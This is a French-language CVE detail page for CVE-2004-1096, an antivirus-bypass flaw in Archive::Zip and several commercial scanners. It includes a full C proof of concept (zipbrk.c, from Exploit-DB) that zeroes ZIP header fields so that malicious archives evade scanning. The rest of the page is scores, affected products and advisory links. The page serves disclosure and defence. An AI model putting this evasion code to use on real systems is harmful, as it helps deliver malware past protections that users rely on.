CVE-2004-1096 : Détail

CVE-2004-1096

20.25%V4
Network
2004-12-01
04h00 +00:00
2017-07-10
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 629

Date de publication : 2004-11-13 23h00 +00:00
Auteur : oc192
EDB Vérifié : Yes

/* zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937 Copyright (C) 2004 oc.192 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. oc.192 phreaker net */ #include <stdio.h> #include <stdlib.h> unsigned short LOCAL_HEADER_OFFSET = 16; unsigned short CENTRAL_HEADER_OFFSET = 18; unsigned long DATA_REPLACE_VALUE = 0x00000000; void show_usage() { printf("zipbrk - by oc.192 [oc.192@phreaker.net]\n"); printf("Attempts to utilize the vulnerabilities described in:\n"); printf("CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n" "CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n" "CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n"); printf(" Usage: zipbrk <zip_file>\n"); } void patch_file(FILE *hfile, unsigned long offset) { char *buffer = malloc(1); memset(buffer, 0, 1); fseek(hfile, offset, SEEK_SET); fwrite(buffer, 1, 1, hfile); fwrite(buffer, 1, 1, hfile); fwrite(buffer, 1, 1, hfile); fwrite(buffer, 1, 1, hfile); free(buffer); } void scan_file(char *filename) { FILE *hfile; unsigned char buffer; unsigned long offset = 0; if ((hfile = fopen(filename, "rb+")) == NULL) { printf("[-] Error: Unable to open %s", filename); return; } printf("[+] Scanning %s ...\n", filename); while (fread(&buffer, sizeof(buffer), 1, hfile)) { if (buffer == 0x50) { fread(&buffer, sizeof(buffer), 1, hfile); if (buffer == 0x4B) { fread(&buffer, sizeof(buffer), 1, hfile); if (buffer == 0x01) { fread(&buffer, sizeof(buffer), 1, hfile); if (buffer == 0x02) { /* perform write */ offset = ftell(hfile); offset = offset + LOCAL_HEADER_OFFSET; printf(" [-] Writing local header patch [0x%.8X]\n", offset); patch_file(hfile, offset); fseek(hfile, offset, SEEK_SET); } } else if (buffer == 0x03) { fread(&buffer, sizeof(buffer), 1, hfile); if (buffer == 0x04) { /* perform write */ offset = ftell(hfile); offset = offset + CENTRAL_HEADER_OFFSET; printf(" [-] Writing central header patch [0x%.8X]\n", offset); patch_file(hfile, offset); fseek(hfile, offset, SEEK_SET); } } } } } printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile)); fclose(hfile); } int main(int argc, char *argv[]) { if (argc != 2) { show_usage(); return 0; } if (!strcmp(argv[1], "-h") || !strcmp(argv[1], "/?")) { show_usage(); return 0; } scan_file(argv[1]); return 0; } // milw0rm.com [2004-11-14]

Products Mentioned

Configuraton 0

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Etrust_antivirus >> Version 7.0

Broadcom>>Etrust_antivirus >> Version 7.1

Broadcom>>Etrust_antivirus_gateway >> Version 7.0

Broadcom>>Etrust_antivirus_gateway >> Version 7.1

Broadcom>>Etrust_ez_antivirus >> Version 6.1

Broadcom>>Etrust_ez_antivirus >> Version 6.2

Broadcom>>Etrust_ez_antivirus >> Version 6.3

Broadcom>>Etrust_ez_armor >> Version 2.0

Broadcom>>Etrust_ez_armor >> Version 2.3

Broadcom>>Etrust_ez_armor >> Version 2.4

Broadcom>>Etrust_intrusion_detection >> Version 1.4.1.13

Broadcom>>Etrust_intrusion_detection >> Version 1.4.5

Broadcom>>Etrust_intrusion_detection >> Version 1.5

Broadcom>>Etrust_secure_content_manager >> Version 1.0

Broadcom>>Etrust_secure_content_manager >> Version 1.1

Broadcom>>Inoculateit >> Version 6.0

Ca>>Etrust_antivirus >> Version 7.0_sp2

    Ca>>Etrust_secure_content_manager >> Version 1.0

      Eset_software>>Nod32_antivirus >> Version 1.0.11

        Eset_software>>Nod32_antivirus >> Version 1.0.12

          Eset_software>>Nod32_antivirus >> Version 1.0.13

            Kaspersky_lab>>Kaspersky_anti-virus >> Version 3.0

              Kaspersky_lab>>Kaspersky_anti-virus >> Version 4.0

                Kaspersky_lab>>Kaspersky_anti-virus >> Version 5.0

                  Mcafee>>Antivirus_engine >> Version 4.3.20

                  Rav_antivirus>>Rav_antivirus_desktop >> Version 8.6

                    Rav_antivirus>>Rav_antivirus_for_file_servers >> Version 1.0

                      Rav_antivirus>>Rav_antivirus_for_mail_servers >> Version 8.4.2

                        Sophos>>Sophos_anti-virus >> Version 3.4.6

                        Sophos>>Sophos_anti-virus >> Version 3.78

                        Sophos>>Sophos_anti-virus >> Version 3.78d

                        Sophos>>Sophos_anti-virus >> Version 3.79

                        Sophos>>Sophos_anti-virus >> Version 3.80

                        Sophos>>Sophos_anti-virus >> Version 3.81

                        Sophos>>Sophos_anti-virus >> Version 3.82

                        Sophos>>Sophos_anti-virus >> Version 3.83

                        Sophos>>Sophos_anti-virus >> Version 3.84

                        Sophos>>Sophos_anti-virus >> Version 3.85

                        Sophos>>Sophos_anti-virus >> Version 3.86

                        Sophos>>Sophos_puremessage_anti-virus >> Version 4.6

                          Sophos>>Sophos_small_business_suite >> Version 1.0

                            Configuraton 0

                            Gentoo>>Linux >> Version *

                            Gentoo>>Linux >> Version 1.4

                            Mandrakesoft>>Mandrake_linux >> Version 10.1

                            Mandrakesoft>>Mandrake_linux >> Version 10.1

                              Suse>>Suse_linux >> Version 9.2

                              Références

                              http://secunia.com/advisories/13038/
                              Tags : third-party-advisory, x_refsource_SECUNIA
                              http://www.mandriva.com/security/advisories?name=MDKSA-2004:118
                              Tags : vendor-advisory, x_refsource_MANDRAKE
                              http://www.kb.cert.org/vuls/id/492545
                              Tags : third-party-advisory, x_refsource_CERT-VN
                              http://www.securityfocus.com/bid/11448
                              Tags : vdb-entry, x_refsource_BID
                              http://www.gentoo.org/security/en/glsa/glsa-200410-31.xml
                              Tags : vendor-advisory, x_refsource_GENTOO